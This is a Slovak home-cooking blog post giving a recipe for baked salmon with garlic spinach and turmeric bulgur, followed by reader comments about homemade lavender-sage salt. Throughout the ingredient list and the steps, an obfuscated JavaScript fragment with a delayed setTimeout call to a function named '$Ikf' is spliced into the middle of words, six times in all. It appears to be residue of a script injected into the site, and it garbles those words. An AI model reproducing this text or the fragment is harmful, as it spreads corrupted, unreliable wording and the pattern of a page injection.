Dnes to bude rýchla večera, za ktorú ma môj manžel, aj dcérka milujú ešte o kúsok viac. Síce mladá dáma má fázu sabotovania špenátu, rybku môže od malinka na všetky možné spôsoby. Veľmi fajn na tomto jedle je, že je expresne rýchlo hotové a chutí ako z najlepšej reštaurácie. Tak poďme na to!
Ingrediencie
- 4 porcie lososa, najlepšie z lovu, alebo kvalitnej farmy (veľkosť porcií nechám na vás)
- levandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anduľovo-šalviová soľ
- olivový olej, alebo ghee maslo
- 2 vrecúška čerstvého baby španátu v zime a v lete zo záhradky, ak máte tú možnosť také 3-4 veľké hrste
- 4 strúčiky cesnaku
- soľ
- korenie
- 1 pl olivového oleja
- 200 g bulguru
- 500 ml vody
- 1 pl olivového oleja alebo ghee masla
- 1/2 čl soli
- 1/2 kl mletej kurkumy
- hrsť nasekanej čerstvej vňate koriandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andra
- citrón
Postup
- Lososa poriadne umyjeme, osušíme a odstránime kožu. Z oboch strán ho potrieme olivovým olejom a posypeme levandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anduľovo-šalviovým korením a prípadne dosolíme podľa chuti. Položíme do pekáča na pečiaci papier a dáme do studenej rúry. Zapneme gril na 250 stupňov a stopneme si 15-20 minút. každá rúra pečie inak a každý má rád inak prepečeného lososa. Ja nemám rada, keď je v strede surový, takže ho nechám 20 minút a prepečie sa úplne. Ak ste v rúre predtým piekli napríklad koláč a rúru máte teplú, tak ju nechajte zohriať na 200 stupňov a pečte tiež 15-20 minút, ale už pri tých 200 stupňoch.
- Ak máte deti menšie, alebo deti do roka a pol, alebo im nechcete dávať pečené mäso ani v staršom veku, vhodnejšie je, aby ste ju urobili na pare. Filet vložíte do parného hrnca, položíte naň plátok masla a 20 minút, až pol hodinku ho paríte, kým nie je úplne hotový.
- Poďme si pripraviť špenát. Je vynikajúcim zdrojom vápnika, železa, ale obsahuje aj veľa kyseliny šťavelovej, ktorá zabraňuje vstrebávaniu vápnika. Preto je špenát vhodnejšie upraviť tepelne, kedy sa odstráni kyselina šťavelová a vápniku ani železu teplota neublíži. Železa ale vraj neobsahuje až tak veľa, ako sa doteraz myslelo, vraj išlo o matematickú chybu v desatinnej čiarke. Špenát je treba vyzdvinúť hlavne kvôli vysokému obsahu vápnika a kyseliny listovej.
- Špenát poriadne umyjeme, môžeme ho pokrájať, alebo nechať celý. Na 1 pl olivového oleja minútku speníme na kolieska nakrájaný cesnak (ten odporúčam nakrájať aspoň 5-10 minút pred tepelným ohrevom, aby mohli enzýmy vykonať svoju prácu ešte predtým, ako ich teplom zničíme 😉 ). Pridáme špenát a na strednej teplote ho krátko restujeme. Len toľko, aby zmenšil svoj objem. Posolíme ho, pokoreníme, zakryjeme pokrievkou a odstavíme z varnej dosky.
- Zarovno so špenátom si stíhame pripraviť aj bulgur. Na 1 pl olivového oleja krátko orestujeme bulgur s kurkumou. Podobne ako tarhoňu. Posolíme, zalejeme vriacou vodou, stíšime plameň a za jemného bublania pod pokrievkou varíme 5 minút, odstavíme z varnej dosky a necháme ešte pod pokrievkou odpočívať, kým nevsiakne všetka voda. Nasekáme si čerstvú vňať koriandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andra, v prípade, že vám chutí, ak nie, tak to nesilte. My sme doma rozdelení na dva tabory. Manželovi koriandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander nechutí a ja ho milujem, tak robievam dve verzie. V každom prípade, ale aj tú nekoriandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}androvú verziu pokropte citrónovou šťavou a premiešajte. Bulgur je výživná a ľahká forma pšenice, ktorá podporí trávenie, ale aj chudnutie. Má nízky glykemický index a teda vám po ňom neskáče v krvi cukor a inzulín ako na húsenkovej dráhe.
- Medzitým ako sme pripravovali španát a bulgur, nám pípne rúra, že už je hotovo, tak si môžme všetko naložiť na tanier a vychutnať si zdravé a ľahké jedlo, ktoré nás nielen zasýti, je rýchle a chutné, ale zároveň naše telo nabombuje živinami a zdravými tukmi 😀
Dobrú chuť všetkým za stolom želám 😀
Mňaaam ?
Mila Miriam, chcem sa Vás opýtať na soľ levanduľovo-šalviovú – vyrábate si ju sama ? 🙂 ak ano nebol by receptík? ?
Ano, ZUzka, sama si ju vyrabam 🙂 POl na pol sušene kvety levandule a sušenej šalvie v maziariku rozmaziarikovat s rovnakym mnozstvom hrubozrnnej soli. Odlozit do poharika a pouzivat 😀
Ďakujem pekne ?